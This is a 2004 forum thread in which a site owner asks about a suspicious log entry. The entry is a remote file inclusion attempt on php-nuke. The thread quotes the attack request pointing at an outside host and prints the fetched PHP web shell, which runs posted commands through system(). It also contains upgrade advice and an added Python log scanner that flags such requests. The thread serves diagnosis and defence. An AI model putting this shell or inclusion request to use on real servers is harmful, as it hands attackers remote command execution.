
Curious Log Entry

Preventing potential hack attempts

         

BohrMe

4:57 am on Feb 1, 2004 (gmt 0)

10+ Year Member



I just noticed that periodically I will get an entry in my logs that looks like this:

64.246.26.137 - - [31/Jan/2004:14:58:04 -0500] "GET /modules.php?name=http://www.reviewsource.org/.i/2 HTTP/1.0" 200 14873 "-" "Python-urllib/1.15"

After wget'ting the file I find:

<? 
$OS = system('uname -a');
echo "<OS>".$OS."</OS>";
?>
<form action="<?=$REQUEST_URI;?>" method=POST>
<input type=text name=lox value='<?=$lox;?>' ><br>
<input type=submit>
</form>
<pre>
<xmp>
<?=system($lox);?>
</xmp>
</pre>

I have a feeling this is a hacking attempt because the base URL has nothing to do with my website. This concerns me because they got more than the 77 bytes my site sends me when I use that URL.

Has anyone seen this before? Is it a hacking attempt? And if so, how can I use .htaccess to filter on "name=http" and redirect them to my bad bot script? I believe this to be a good phrase to filter on since this will never get called during normal operations.

Thanks.
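
The log check the first post asks about, as an added example that is not part of the original thread: it flags Apache combined-format entries in which a query parameter value is itself a remote URL, and marks those the server answered with a 2xx status and more than the 77 bytes the poster expected. The function names, the `baseline_size` parameter, and the second and third sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Apache combined format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "[^"]*" "(?P<agent>[^"]*)"'
)
# A parameter value that is itself a remote URL, as in the entry from the post.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def remote_url_params(line):
    """Return a finding dict if any query parameter value is a remote URL, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = m.group("target").partition("?")[2]
    # parse_qsl percent-decodes, so name=http%3A%2F%2F... is caught as well.
    hits = [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_RE.match(v)]
    if not hits:
        return None
    size = 0 if m.group("size") == "-" else int(m.group("size"))
    return {"host": m.group("host"), "time": m.group("time"), "params": hits,
            "status": int(m.group("status")), "size": size,
            "agent": m.group("agent")}

def scan(lines, baseline_size=77):
    """Collect findings; 'review' marks 2xx answers larger than the expected body."""
    findings = []
    for line in lines:
        f = remote_url_params(line)
        if f:
            f["review"] = 200 <= f["status"] < 300 and f["size"] > baseline_size
            findings.append(f)
    return findings

# First line is the entry quoted in the post; the other two are constructed.
SAMPLE_LOG = [
    '64.246.26.137 - - [31/Jan/2004:14:58:04 -0500] "GET /modules.php?name=http://www.reviewsource.org/.i/2 HTTP/1.0" 200 14873 "-" "Python-urllib/1.15"',
    '203.0.113.7 - - [31/Jan/2004:15:02:11 -0500] "GET /modules.php?name=News&file=article HTTP/1.1" 200 9120 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [31/Jan/2004:15:03:40 -0500] "GET /modules.php?name=http%3A%2F%2Fexample.com%2Fx HTTP/1.0" 404 210 "-" "Python-urllib/1.15"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["host"], f["status"], f["size"], f["params"], "REVIEW" if f["review"] else "")
```
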

dcrombie

12:31 pm on Feb 1, 2004 (gmt 0)



If you're using a version of php-nuke older than 6.9 or so then you should upgrade to the latest version (7.x). There are a number of SQL-injection bugs among other exploits documented on the web.

Google: php-nuke exploit [google.com]

BohrMe

2:06 pm on Feb 1, 2004 (gmt 0)




I have 6.9.

dcrombie

5:04 pm on Feb 1, 2004 (gmt 0)



Then you should probably upgrade: php-nuke 6.9 exploit [google.com]

BohrMe

10:08 pm on Feb 1, 2004 (gmt 0)




I already have a security policy in place that takes care of this exploit plus many others. In fact, it was this exploit that caused me to seriously secure my website. Burned once, never again.

Thanks.